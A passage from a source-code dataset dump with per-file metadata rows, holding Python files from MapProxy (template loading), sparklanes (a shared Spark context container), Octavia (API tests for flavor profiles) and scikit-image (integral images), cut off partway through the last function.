] | null | null | null | mapproxy/template.py | gongzhengkun/mapproxy | 3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | mapproxy/template.py | gongzhengkun/mapproxy | 3c6fd6d61aa95ddcc4e76a9a2b5dcf42f13d9f95 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # This file is part of the MapProxy project.
# Copyright (C) 2010 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Loading of template files (e.g. capability documents)
"""
import os
import pkg_resources
from mapproxy.util.ext.tempita import Template, bunch
from mapproxy.config.config import base_config
__all__ = ['Template', 'bunch', 'template_loader']
def template_loader(module_name, location='templates', namespace=None):
    """Return a callable that loads templates by name.

    The callable looks in ``base_config().template_dir`` first (so deployments
    can override the shipped templates) and falls back to the package data of
    *module_name* under *location*.

    Args:
        module_name: dotted module name whose package data holds the templates.
        location: sub-directory of the package data containing the templates.
        namespace: optional dict of names made available to the templates.
    """
    # Use None instead of a mutable {} default so a single dict is not shared
    # between every call of template_loader (mutable-default-argument pitfall).
    if namespace is None:
        namespace = {}

    class loader(object):
        def __call__(self, name, from_template=None, default_inherit=None):
            # A configured template_dir overrides the packaged templates.
            if base_config().template_dir:
                template_file = os.path.join(base_config().template_dir, name)
            else:
                template_file = pkg_resources.resource_filename(module_name, location + '/' + name)
            return Template.from_filename(template_file, namespace=namespace, encoding='utf-8',
                default_inherit=default_inherit, get_template=self)
    return loader()
| 39.868421 | 99 | 0.712211 |
300fee021fbfe91811b33498b026b2b0cdb1033f | 2,843 | py | Python | sparklanes/_framework/spark.py | ksbg/sparklanes | 0e5fc04a5de46f070213b64319ea6982e28e16da | [
"MIT"
] | 15 | 2018-06-11T08:08:06.000Z | 2022-03-26T00:11:38.000Z | sparklanes/_framework/spark.py | ksbg/pyspark-etl | 0e5fc04a5de46f070213b64319ea6982e28e16da | [
"MIT"
] | 10 | 2019-01-31T03:37:16.000Z | 2021-06-01T22:29:02.000Z | sparklanes/_framework/spark.py | ksbg/pyspark-etl | 0e5fc04a5de46f070213b64319ea6982e28e16da | [
"MIT"
] | 6 | 2018-07-05T10:00:19.000Z | 2019-10-13T13:40:52.000Z | """Used to allow sharing of SparkContext and SparkSession, to avoid having to "getOrCreate" them
again and again for each task. This way, they can just be imported and used right away."""
# pylint: disable=invalid-name,too-many-arguments
from pyspark import SparkContext, PickleSerializer, BasicProfiler
from pyspark.sql import SparkSession
from six import PY2
from sparklanes._framework.env import INIT_SPARK_ON_IMPORT, SPARK_APP_NAME
class SparkContextAndSessionContainer(object):
    """Container holding the shared SparkContext and SparkSession instances.

    Both handles live on the class itself (never on an instance), so any
    change made here is visible to every module importing this container.
    """
    # Shared pyspark handles; populated by init_default()/set_sc()/set_spark().
    sc = None
    spark = None

    def __new__(cls, *args, **kwargs):
        # The container is used purely as a namespace -- forbid instantiation.
        if cls is SparkContextAndSessionContainer:
            raise TypeError('SparkSession & SparkContext container class may not be instantiated.')
        return object.__new__(cls, *args, **kwargs) if PY2 else object.__new__(cls)

    @classmethod
    def set_sc(cls, master=None, appName=None, sparkHome=None, pyFiles=None, environment=None,
               batchSize=0, serializer=PickleSerializer(), conf=None, gateway=None, jsc=None,
               profiler_cls=BasicProfiler):
        """Creates and initializes a new `SparkContext` (the old one will be stopped).

        Argument signature is copied from `pyspark.SparkContext
        <https://spark.apache.org/docs/latest/api/python/pyspark.html#pyspark.SparkContext>`_.

        NOTE(review): the ``serializer`` default is evaluated once at class
        definition time, so all calls share one PickleSerializer instance --
        harmless if the serializer is stateless; confirm.
        """
        if cls.sc is not None:
            cls.sc.stop()
        cls.sc = SparkContext(master, appName, sparkHome, pyFiles, environment, batchSize,
                              serializer,
                              conf, gateway, jsc, profiler_cls)
        # A new context invalidates the old session; rebuild it.
        cls.__init_spark()

    @classmethod
    def set_spark(cls, master=None, appName=None, conf=None, hive_support=False):
        """Creates and initializes a new `SparkSession`. Argument signature is copied from
        `pyspark.sql.SparkSession
        <https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.SparkSession>`_.
        """
        sess = SparkSession.builder
        # Builder methods record options on the builder; chaining not required.
        if master:
            sess.master(master)
        if appName:
            sess.appName(appName)
        if conf:
            sess.config(conf=conf)
        if hive_support:
            sess.enableHiveSupport()
        cls.spark = sess.getOrCreate()

    @classmethod
    def init_default(cls):
        """Create and initialize a default SparkContext and SparkSession"""
        cls.__init_sc()
        cls.__init_spark()

    @classmethod
    def __init_sc(cls):
        # Default context named after SPARK_APP_NAME.
        cls.sc = SparkContext(appName=SPARK_APP_NAME).getOrCreate()

    @classmethod
    def __init_spark(cls):
        # getOrCreate() reuses an already-active session when one exists.
        cls.spark = SparkSession.builder.appName(SPARK_APP_NAME).getOrCreate()
# Optionally build the default context/session at import time so tasks can
# simply import this module and use `sc`/`spark` right away (controlled by
# the INIT_SPARK_ON_IMPORT flag from sparklanes' environment config).
if INIT_SPARK_ON_IMPORT:
    SparkContextAndSessionContainer.init_default()
| 38.945205 | 102 | 0.679212 |
f9cd1cbf523d65394631a8c524ee17978f942137 | 29,034 | py | Python | octavia/tests/functional/api/v2/test_flavor_profiles.py | mauroseb/octavia | 8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7 | [
"Apache-2.0"
] | null | null | null | octavia/tests/functional/api/v2/test_flavor_profiles.py | mauroseb/octavia | 8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7 | [
"Apache-2.0"
] | null | null | null | octavia/tests/functional/api/v2/test_flavor_profiles.py | mauroseb/octavia | 8f032d884e0f89ac69d5b6e5f5b77d19ee6eb1d7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 Walmart Stores Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_db import exception as odb_exceptions
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
class TestFlavorProfiles(base.BaseAPITest):
root_tag = 'flavorprofile'
root_tag_list = 'flavorprofiles'
root_tag_links = 'flavorprofile_links'
def _assert_request_matches_response(self, req, resp, **optionals):
self.assertTrue(uuidutils.is_uuid_like(resp.get('id')))
self.assertEqual(req.get('name'), resp.get('name'))
self.assertEqual(req.get(constants.PROVIDER_NAME),
resp.get(constants.PROVIDER_NAME))
self.assertEqual(req.get(constants.FLAVOR_DATA),
resp.get(constants.FLAVOR_DATA))
    def test_empty_list(self):
        # GET on the collection before any profile exists returns an empty list.
        response = self.get(self.FPS_PATH)
        api_list = response.json.get(self.root_tag_list)
        self.assertEqual([], api_list)
    def test_create(self):
        # POST a well-formed flavor profile and verify the response echoes it.
        fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
                   constants.FLAVOR_DATA: '{"hello": "world"}'}
        body = self._build_body(fp_json)
        response = self.post(self.FPS_PATH, body)
        api_fp = response.json.get(self.root_tag)
        self._assert_request_matches_response(fp_json, api_fp)
def test_create_with_missing_name(self):
fp_json = {constants.PROVIDER_NAME: 'pr1',
constants.FLAVOR_DATA: '{"x": "y"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute name. Value: "
"'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_provider(self):
fp_json = {'name': 'xyz', constants.FLAVOR_DATA: '{"x": "y"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute provider_name. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_flavor_data(self):
fp_json = {'name': 'xyz', constants.PROVIDER_NAME: 'pr1'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute flavor_data. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_empty_flavor_data(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body)
api_fp = response.json.get(self.root_tag)
self._assert_request_matches_response(fp_json, api_fp)
def test_create_with_long_name(self):
fp_json = {'name': 'n' * 256, constants.PROVIDER_NAME: 'test1',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_create_with_long_provider(self):
fp_json = {'name': 'name1', constants.PROVIDER_NAME: 'n' * 256,
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_create_with_long_flavor_data(self):
fp_json = {'name': 'name1', constants.PROVIDER_NAME: 'amp',
constants.FLAVOR_DATA: 'n' * 4097}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
def test_create_authorized(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.post(self.FPS_PATH, body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_fp = response.json.get(self.root_tag)
self._assert_request_matches_response(fp_json, api_fp)
def test_create_not_authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
fp_json = {'name': 'name',
constants.PROVIDER_NAME: 'xyz',
constants.FLAVOR_DATA: '{"x": "y"}'}
body = self._build_body(fp_json)
response = self.post(self.FPS_PATH, body, status=403)
api_fp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_fp)
def test_create_db_failure(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(fp_json)
with mock.patch("octavia.db.repositories.FlavorProfileRepository."
"create") as mock_create:
mock_create.side_effect = Exception
self.post(self.FPS_PATH, body, status=500)
mock_create.side_effect = odb_exceptions.DBDuplicateEntry
self.post(self.FPS_PATH, body, status=409)
def test_create_with_invalid_json(self):
fp_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.FLAVOR_DATA: '{hello: "world"}'}
body = self._build_body(fp_json)
self.post(self.FPS_PATH, body, status=400)
    def test_get(self):
        # A created profile can be retrieved by id with its fields intact.
        fp = self.create_flavor_profile('name', 'noop_driver',
                                        '{"x": "y"}')
        self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
        response = self.get(
            self.FP_PATH.format(
                fp_id=fp.get('id'))).json.get(self.root_tag)
        self.assertEqual('name', response.get('name'))
        self.assertEqual(fp.get('id'), response.get('id'))
def test_get_one_deleted_id(self):
response = self.get(self.FP_PATH.format(fp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Flavor profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_get_one_fields_filter(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id')), params={
'fields': ['id', constants.PROVIDER_NAME]}
).json.get(self.root_tag)
self.assertEqual(fp.get('id'), response.get('id'))
self.assertIn(u'id', response)
self.assertIn(constants.PROVIDER_NAME, response)
self.assertNotIn(u'name', response)
self.assertNotIn(constants.FLAVOR_DATA, response)
def test_get_authorized(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(
self.FP_PATH.format(
fp_id=fp.get('id'))).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual('name', response.get('name'))
self.assertEqual(fp.get('id'), response.get('id'))
def test_get_not_authorized(self):
fp = self.create_flavor_profile('name', 'noop_driver',
'{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.FP_PATH.format(fp_id=fp.get('id')), status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_all(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
ref_fp_1 = {u'flavor_data': u'{"image": "ubuntu"}',
u'id': fp1.get('id'), u'name': u'test1',
constants.PROVIDER_NAME: u'noop_driver'}
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
ref_fp_2 = {u'flavor_data': u'{"image": "ubuntu"}',
u'id': fp2.get('id'), u'name': u'test2',
constants.PROVIDER_NAME: u'noop_driver-alt'}
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.FPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
self.assertIn(ref_fp_1, api_list)
self.assertIn(ref_fp_2, api_list)
def test_get_all_fields_filter(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.FPS_PATH, params={
'fields': ['id', 'name']})
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
for profile in api_list:
self.assertIn(u'id', profile)
self.assertIn(u'name', profile)
self.assertNotIn(constants.PROVIDER_NAME, profile)
self.assertNotIn(constants.FLAVOR_DATA, profile)
def test_get_all_authorized(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.FPS_PATH)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
def test_get_all_not_authorized(self):
fp1 = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_flavor_profile('test2', 'noop_driver-alt',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.FPS_PATH, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_update(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.FLAVOR_DATA))
def test_update_deleted_id(self):
update_data = {'name': 'fake_profile'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=constants.NIL_UUID),
body, status=404)
self.assertEqual('Flavor profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_update_nothing(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
body = self._build_body({})
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.FLAVOR_DATA))
def test_update_name_none(self):
self._test_update_param_none(constants.NAME)
def test_update_provider_name_none(self):
self._test_update_param_none(constants.PROVIDER_NAME)
def test_update_flavor_data_none(self):
self._test_update_param_none(constants.FLAVOR_DATA)
def _test_update_param_none(self, param_name):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
expect_error_msg = ("None is not a valid option for %s" %
param_name)
body = self._build_body({param_name: None})
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body,
status=400)
self.assertEqual(expect_error_msg, response.json['faultstring'])
def test_update_no_flavor_data(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
def test_update_authorized(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')),
body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver-alt',
response.get(constants.PROVIDER_NAME))
self.assertEqual('{"hello": "world"}',
response.get(constants.FLAVOR_DATA))
def test_update_not_authorized(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
update_data = {'name': 'the_profile', constants.PROVIDER_NAME: 'amp',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')),
body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}',
response.get(constants.FLAVOR_DATA))
def test_update_in_use(self):
fp = self.create_flavor_profile('test_profile', 'noop_driver',
'{"x": "y"}')
self.create_flavor('name1', 'description', fp.get('id'), True)
# Test updating provider while in use is not allowed
update_data = {'name': 'the_profile',
constants.PROVIDER_NAME: 'noop_driver-alt'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body,
status=409)
err_msg = ("Flavor profile {} is in use and cannot be "
"modified.".format(fp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
# Test updating flavor data while in use is not allowed
update_data = {'name': 'the_profile',
constants.FLAVOR_DATA: '{"hello": "world"}'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body,
status=409)
err_msg = ("Flavor profile {} is in use and cannot be "
"modified.".format(fp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
# Test that you can still update the name when in use
update_data = {'name': 'the_profile'}
body = self._build_body(update_data)
response = self.put(self.FP_PATH.format(fp_id=fp.get('id')), body)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('the_profile', response.get('name'))
self.assertEqual('noop_driver', response.get(constants.PROVIDER_NAME))
self.assertEqual('{"x": "y"}', response.get(constants.FLAVOR_DATA))
def test_delete(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.delete(self.FP_PATH.format(fp_id=fp.get('id')))
response = self.get(self.FP_PATH.format(
fp_id=fp.get('id')), status=404)
err_msg = "Flavor Profile %s not found." % fp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_deleted_id(self):
response = self.delete(self.FP_PATH.format(fp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Flavor profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
    def test_delete_nonexistent_id(self):
        # Deleting an id that never existed returns 404 with a clear message.
        response = self.delete(self.FP_PATH.format(fp_id='bogus_id'),
                               status=404)
        self.assertEqual('Flavor profile bogus_id not found.',
                         response.json.get('faultstring'))
def test_delete_authorized(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(self.FP_PATH.format(fp_id=fp.get('id')))
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(self.FP_PATH.format(
fp_id=fp.get('id')), status=404)
err_msg = "Flavor Profile %s not found." % fp.get('id')
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_delete_not_authorized(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.assertTrue(uuidutils.is_uuid_like(fp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
response = self.delete(self.FP_PATH.format(
fp_id=fp.get('id')), status=403)
api_fp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_fp)
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
def test_delete_in_use(self):
fp = self.create_flavor_profile('test1', 'noop_driver',
'{"image": "ubuntu"}')
self.create_flavor('name1', 'description', fp.get('id'), True)
response = self.delete(self.FP_PATH.format(fp_id=fp.get('id')),
status=409)
err_msg = ("Flavor profile {} is in use and cannot be "
"modified.".format(fp.get('id')))
self.assertEqual(err_msg, response.json.get('faultstring'))
response = self.get(
self.FP_PATH.format(fp_id=fp.get('id'))).json.get(self.root_tag)
self.assertEqual('test1', response.get('name'))
| 49.886598 | 79 | 0.597644 |
3503a652c351bffd54f475a1937194144e327487 | 1,479 | py | Python | skimage/transform/integral.py | odebeir/scikits-image | 13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e | [
"BSD-3-Clause"
] | 8 | 2016-03-11T13:23:51.000Z | 2021-12-19T10:43:26.000Z | skimage/transform/integral.py | odebeir/scikits-image | 13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e | [
"BSD-3-Clause"
] | 5 | 2021-03-19T08:36:48.000Z | 2022-01-13T01:52:34.000Z | skimage/transform/integral.py | odebeir/scikits-image | 13b2170dfd3ee9065ba6d65f29ff37f6b3bf948e | [
"BSD-3-Clause"
] | 4 | 2020-06-19T00:04:34.000Z | 2021-02-23T07:24:00.000Z | import numpy as np
def integral_image(x):
    r"""Integral image / summed area table.

    The integral image contains the sum of all elements above and to the
    left of it, i.e.:

    .. math::

       S[m, n] = \sum_{i \leq m} \sum_{j \leq n} X[i, j]

    Parameters
    ----------
    x : ndarray
        Input image.

    Returns
    -------
    S : ndarray
        Integral image / summed area table.

    References
    ----------
    .. [1] F.C. Crow, "Summed-area tables for texture mapping,"
           ACM SIGGRAPH Computer Graphics, vol. 18, 1984, pp. 207-212.
    """
    # Cumulative sum along columns then rows yields the 2-D prefix sum.
    # The docstring is a raw string: `\sum`/`\leq` would otherwise be
    # invalid escape sequences (SyntaxWarning on modern CPython).
    return x.cumsum(1).cumsum(0)
def integrate(ii, r0, c0, r1, c1):
    """Use an integral image to integrate over a given window.

    Parameters
    ----------
    ii : ndarray
        Integral image.
    r0, c0 : int or ndarray
        Top-left corner(s) of block to be summed.
    r1, c1 : int or ndarray
        Bottom-right corner(s) of block to be summed.

    Returns
    -------
    S : scalar or ndarray
        Integral (sum) over the given window(s).
    """
    # Promote scalar corners to 1-element arrays so one code path handles both.
    if np.isscalar(r0):
        r0, c0, r1, c1 = [np.asarray([x]) for x in (r0, c0, r1, c1)]
    S = np.zeros(r0.shape, ii.dtype)
    # Standard summed-area-table formula:
    #   sum = ii[r1, c1] - ii[r0-1, c1] - ii[r1, c0-1] + ii[r0-1, c0-1]
    # The `good` masks guard the subtractions so windows touching the
    # top/left edges stay in bounds.
    S += ii[r1, c1]
    good = (r0 >= 1) & (c0 >= 1)
    S[good] += ii[r0[good] - 1, c0[good] - 1]
    good = r0 >= 1
    S[good] -= ii[r0[good] - 1, c1[good]]
    good = c0 >= 1
    S[good] -= ii[r1[good], c0[good] - 1]
    if S.size == 1:
